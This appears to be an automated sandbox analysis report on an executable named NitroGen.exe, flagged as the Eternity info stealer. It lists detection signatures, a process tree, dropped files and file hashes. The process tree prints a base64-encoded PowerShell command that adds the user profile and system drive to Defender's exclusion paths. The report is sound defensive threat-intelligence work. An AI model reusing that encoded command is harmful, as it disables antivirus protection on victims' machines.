Analysis

  • max time kernel
    120s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    22-01-2024 22:41

General

  • Target

    NitroGen.exe

  • Size

    36.4MB

  • MD5

    4f9148bbb133acbd8ffeeda8fc81c305

  • SHA1

    0e8bab7aab5501ac77a90935f4139be3f475480b

  • SHA256

    a8ebcfce04f8660ef44e4e4bb1d2c544dbaceb6a8be53cc2df572a8cc245d557

  • SHA512

    8e4269fdf0f14c41bb2b16cdac72e4362ba46ab77a3b98c61ba30f8279a3a28ab4c6b18a06b2656b9572a143605027e369f2813e01076ca733cbf6c33808540e

  • SSDEEP

    786432:u2iDnIySTaHNpf45q4oX70LaakT7WybuS38s4HaiuhxqDCv+AQ:u2KS+Hrf45zorR9P8s4NDAa

Malware Config

Signatures

  • Detects Eternity stealer 2 IoCs
  • Eternity

    Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 14 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 3 IoCs
  • Detects Pyinstaller 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\NitroGen.exe
    "C:\Users\Admin\AppData\Local\Temp\NitroGen.exe"
    1⤵
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1700
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAagBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAdgBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAZQBiACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1052
    • C:\Windows\BTCJ.exe
      "C:\Windows\BTCJ.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2704
      • C:\Windows\BTCJ.exe
        "C:\Windows\BTCJ.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:2492
    • C:\Windows\BTST.exe
      "C:\Windows\BTST.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Modifies system certificate store
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2472
      • C:\Users\Admin\AppData\Local\Temp\dcd.exe
        "C:\Users\Admin\AppData\Local\Temp\dcd.exe" -path=""
        3⤵
        • Executes dropped EXE
        PID:3004
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -u -p 2472 -s 1556
        3⤵
          PID:2644
      • C:\Windows\FGiftGen.exe
        "C:\Windows\FGiftGen.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1752
        • C:\Windows\FGiftGen.exe
          "C:\Windows\FGiftGen.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:2936

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\CabE7D2.tmp

      Filesize

      65KB

      MD5

      ac05d27423a85adc1622c714f2cb6184

      SHA1

      b0fe2b1abddb97837ea0195be70ab2ff14d43198

      SHA256

      c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

      SHA512

      6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

    • C:\Users\Admin\AppData\Local\Temp\TarE7F4.tmp

      Filesize

      171KB

      MD5

      9c0c641c06238516f27941aa1166d427

      SHA1

      64cd549fb8cf014fcd9312aa7a5b023847b6c977

      SHA256

      4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

      SHA512

      936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

    • C:\Users\Admin\AppData\Local\Temp\_MEI17522\python312.dll

      Filesize

      640KB

      MD5

      1f7331ec9c153418ac7e52c0c2f45bc8

      SHA1

      96d01d2b6657bd182afe530c47d9cf0e491e7627

      SHA256

      3f18bf6f5f81b15cad7dcfd14b05eb9269c483aeb0210efe8ace07cc02f05d83

      SHA512

      64bce5a4daf71c9cc11daaaa1e62db34e9f3a9b06dd5ccf61e0bd3a4c391b15d5459f276814f6fc62eb0fc7138fe99a146f419d9853bfa01b24cc9c553f7e6ad

    • C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-core-file-l1-2-0.dll

      Filesize

      21KB

      MD5

      bcb8b9f6606d4094270b6d9b2ed92139

      SHA1

      bd55e985db649eadcb444857beed397362a2ba7b

      SHA256

      fa18d63a117153e2ace5400ed89b0806e96f0627d9db935906be9294a3038118

      SHA512

      869b2b38fd528b033b3ec17a4144d818e42242b83d7be48e2e6da6992111758b302f48f52e0dd76becb526a90a2b040ce143c6d4f0e009a513017f06b9a8f2b9

    • C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-core-file-l2-1-0.dll

      Filesize

      18KB

      MD5

      bfffa7117fd9b1622c66d949bac3f1d7

      SHA1

      402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2

      SHA256

      1ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e

      SHA512

      b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f

    • C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-core-localization-l1-2-0.dll

      Filesize

      21KB

      MD5

      20ddf543a1abe7aee845de1ec1d3aa8e

      SHA1

      0eaf5de57369e1db7f275a2fffd2d2c9e5af65bf

      SHA256

      d045a72c3e4d21165e9372f76b44ff116446c1e0c221d9cea3ab0a1134a310e8

      SHA512

      96dd48df315a7eea280ca3da0965a937a649ee77a82a1049e3d09b234439f7d927d7fb749073d7af1b23dadb643978b70dcdadc6c503fe850b512b0c9c1c78dd

    • C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-core-processthreads-l1-1-1.dll

      Filesize

      21KB

      MD5

      4380d56a3b83ca19ea269747c9b8302b

      SHA1

      0c4427f6f0f367d180d37fc10ecbe6534ef6469c

      SHA256

      a79c7f86462d8ab8a7b73a3f9e469514f57f9fe456326be3727352b092b6b14a

      SHA512

      1c29c335c55f5f896526c8ee0f7160211fd457c1f1b98915bcc141112f8a730e1a92391ab96688cbb7287e81e6814cc86e3b057e0a6129cbb02892108bfafaf4

    • C:\Users\Admin\AppData\Local\Temp\_MEI27042\api-ms-win-core-timezone-l1-1-0.dll

      Filesize

      21KB

      MD5

      2554060f26e548a089cab427990aacdf

      SHA1

      8cc7a44a16d6b0a6b7ed444e68990ff296d712fe

      SHA256

      5ab003e899270b04abc7f67be953eaccf980d5bbe80904c47f9aaf5d401bb044

      SHA512

      fd4d5a7fe4da77b0222b040dc38e53f48f7a3379f69e2199639b9f330b2e55939d89ce8361d2135182b607ad75e58ee8e34b90225143927b15dcc116b994c506

    • C:\Users\Admin\AppData\Local\Temp\_MEI27042\python312.dll

      Filesize

      1.7MB

      MD5

      f23aa992b8e0a301ec8f473d6b784f4b

      SHA1

      ee73a5da238341cb21a781a3ddcb187d1f971680

      SHA256

      0ddfba7779ebc44f2fa819a78b54bc730a5543274986e973beee024fab0ecfc6

      SHA512

      028abb66298fee6173d34f80940f5bdd3988a8373234f32a780ae93e155d90af191d85164077d9b76dc3651bda4d9902ccbfd03d37be3e9662006b65c3defb35

    • C:\Users\Admin\AppData\Local\Temp\_MEI27042\ucrtbase.dll

      Filesize

      2KB

      MD5

      478670f38668c80d6ce9eca03cc1c780

      SHA1

      ebb97d6c4eaf345a2e59f69dfdc0bbd23bce144d

      SHA256

      d37b1415127e0bcd400f5a122e26e3db09a17e0bb79541586c1eb12e5085465f

      SHA512

      d3e3d1fc10a82638a76cb892e7b360538d777f058c2a6259820dffafea9393c5d0cd04159a9fde2fc5b256c1602f4bc44265d86cb4dfd35e1662f94ac25abe65

    • C:\Users\Admin\AppData\Local\Temp\dcd.exe

      Filesize

      227KB

      MD5

      b5ac46e446cead89892628f30a253a06

      SHA1

      f4ad1044a7f77a1b02155c3a355a1bb4177076ca

      SHA256

      def7afcb65126c4b04a7cbf08c693f357a707aa99858cac09a8d5e65f3177669

      SHA512

      bcabbac6f75c1d41364406db457c62f5135a78f763f6db08c1626f485c64db4d9ba3b3c8bc0b5508d917e445fd220ffa66ebc35221bd06560446c109818e8e87

    • C:\Windows\BTCJ.exe

      Filesize

      5.9MB

      MD5

      c66c8f5f59ba05a4b366f6defc8aeda9

      SHA1

      8e7c7d62553d76bdd720736186d9636071e40776

      SHA256

      4a60906be3e70d2070ab2f71b3c8510b570de6cd67d2fe3691eb77d809cd4892

      SHA512

      2689f2c6d8d56b987e81a76676e87badbaf9e6e5b1af1e19f782e4cb498dae80e8e26f8c538b4e683ad061ff3e6e8ed8126e363ebc6ae3629a4c542a899a610f

    • C:\Windows\BTCJ.exe

      Filesize

      4.5MB

      MD5

      8ec473205e232fe4d75504307740b9a5

      SHA1

      acc32ec25f649a2eb2c741d8e7076cd1b23ac8b0

      SHA256

      f4d84fd4f131078541716c10a8e844db020c04632b2f362db78f95b53c93fb31

      SHA512

      c4e327600ac7bcc799507c544fa7ef04f03c365d6dba28938bea2fb76e704811d941713b9a220220369e6820845c5800e7139d4d1d2c61353e5c645d08b91331

    • C:\Windows\BTCJ.exe

      Filesize

      192KB

      MD5

      6a9436bf8edb1e4544f76cf94dd42ca8

      SHA1

      fef35bbbac7bf0219109cfb8c8771b83dbe1e216

      SHA256

      4207b907508773dc31784aad60cc8d887eac3d4748a6879049206812690a9301

      SHA512

      68a19ec80fd019b30df968c0d7cd1cdf994042c90e7f9fe1fadf356dbf4ca019706a894af9e8029956e6ceb6a234bb126afe54cfb7ab3b7db4b8814a204f23c0

    • C:\Windows\BTST.exe

      Filesize

      888KB

      MD5

      b459f5057c58ce07c4268d71819b24d4

      SHA1

      40103d53cfa019dab129c483f806ff0948cbbf35

      SHA256

      221a8a3045c3609338fdd128d959bbef73a84e156315f66fde8cbc508848fe2d

      SHA512

      90a5a734b665e976543917340a169b297923da07a03078bb9da0527224307451d97fd9867bf3fef7ffa6a892c7f7624bd24b7c4e969e47a4029494b368650ba7

    • C:\Windows\FGiftGen.exe

      Filesize

      802KB

      MD5

      4855aacabcabeb320164454f8e477028

      SHA1

      54650195aa48a2a55caddc466bf658c08a9eec88

      SHA256

      9a5cc6acc24e267798bc792dc4867bf7a4e5c75121d26a040f5ce421b2b3303c

      SHA512

      f0c21f9fea39fd4ed61e70e837b2d62a1135edcdd1290edc23b9229a6c37ce428d0afca439e63ccbad85f84a95d637811f34b90310674afbfd9eacbaec42bc04

    • C:\Windows\FGiftGen.exe

      Filesize

      3.2MB

      MD5

      526bd74e5c58474fe75f02b146d79db3

      SHA1

      d25093e545abb150bc472352b8b4a0c4853d52a5

      SHA256

      2c0bcea0b40c98f349751711298304964284ad9447e0edf3351f7ed586d1765d

      SHA512

      fcc30cf92f3eb08271bb4cc08f4dfc9997223eeb36e2acfa8be63293371bf8556deee28a81b178f5173b2e00404e26bf491c0a02cd25c896f9a4f61a769684c5

    • C:\Windows\FGiftGen.exe

      Filesize

      3.8MB

      MD5

      23910ef45885298a2f7473782d6139c5

      SHA1

      ade656bbd4285a90804f68d128876354b1d84167

      SHA256

      25788b97c9e12d4d2732d13a4a18578decb14cf9e0b569f432d9c8be3e40ed4a

      SHA512

      646bd204478092cc31c932db4a3e8001cfe1bacee1e219873b0010645bf8b128127ef2a13030ce70a95fb90dfdcb1a9579e547653bf7d6fd54f4fee9475aaea8

    • \Users\Admin\AppData\Local\Temp\_MEI17522\python312.dll

      Filesize

      2.7MB

      MD5

      8e52e507a3640762aee0578110a4e5e5

      SHA1

      65e2b64e18ee38cb0830097ba347f1c60c30a118

      SHA256

      5eb8a59b10a3864923426f2b60b93b1f61b77574118869eb24d62924dbbcb512

      SHA512

      e26a28f76f814135e20468757107565fc1f46b40ce754550956efcbbb194121f45d31c0175f061126128cef3cba17b0fce5224d4511a2280847c2b733cb4d1ce

    • \Users\Admin\AppData\Local\Temp\_MEI27042\ucrtbase.dll

      Filesize

      992KB

      MD5

      0e0bac3d1dcc1833eae4e3e4cf83c4ef

      SHA1

      4189f4459c54e69c6d3155a82524bda7549a75a6

      SHA256

      8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae

      SHA512

      a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd

    • memory/1052-280-0x0000000073810000-0x0000000073DBB000-memory.dmp

      Filesize

      5.7MB

    • memory/1052-7-0x0000000002690000-0x00000000026D0000-memory.dmp

      Filesize

      256KB

    • memory/1052-5-0x0000000073810000-0x0000000073DBB000-memory.dmp

      Filesize

      5.7MB

    • memory/1052-83-0x0000000002690000-0x00000000026D0000-memory.dmp

      Filesize

      256KB

    • memory/1052-4-0x0000000073810000-0x0000000073DBB000-memory.dmp

      Filesize

      5.7MB

    • memory/1052-6-0x0000000002690000-0x00000000026D0000-memory.dmp

      Filesize

      256KB

    • memory/1052-278-0x0000000073810000-0x0000000073DBB000-memory.dmp

      Filesize

      5.7MB

    • memory/2472-277-0x000007FEF51F0000-0x000007FEF5BDC000-memory.dmp

      Filesize

      9.9MB

    • memory/2472-154-0x0000000000A20000-0x0000000000B06000-memory.dmp

      Filesize

      920KB

    • memory/2472-281-0x000000001B460000-0x000000001B4E0000-memory.dmp

      Filesize

      512KB

    • memory/2472-282-0x0000000000370000-0x00000000003AE000-memory.dmp

      Filesize

      248KB

    • memory/2472-283-0x000000001B460000-0x000000001B4E0000-memory.dmp

      Filesize

      512KB

    • memory/2472-406-0x000007FEF51F0000-0x000007FEF5BDC000-memory.dmp

      Filesize

      9.9MB

    • memory/2472-279-0x000007FEF51F0000-0x000007FEF5BDC000-memory.dmp

      Filesize

      9.9MB

    • memory/2472-219-0x000007FEF51F0000-0x000007FEF5BDC000-memory.dmp

      Filesize

      9.9MB

    • memory/2472-447-0x000007FEF51F0000-0x000007FEF5BDC000-memory.dmp

      Filesize

      9.9MB

    • memory/2472-448-0x000000001B460000-0x000000001B4E0000-memory.dmp

      Filesize

      512KB

    • memory/2472-449-0x000000001B460000-0x000000001B4E0000-memory.dmp

      Filesize

      512KB

    • memory/2472-450-0x000000001B460000-0x000000001B4E0000-memory.dmp

      Filesize

      512KB

    • memory/2492-220-0x000007FEF3590000-0x000007FEF3C60000-memory.dmp

      Filesize

      6.8MB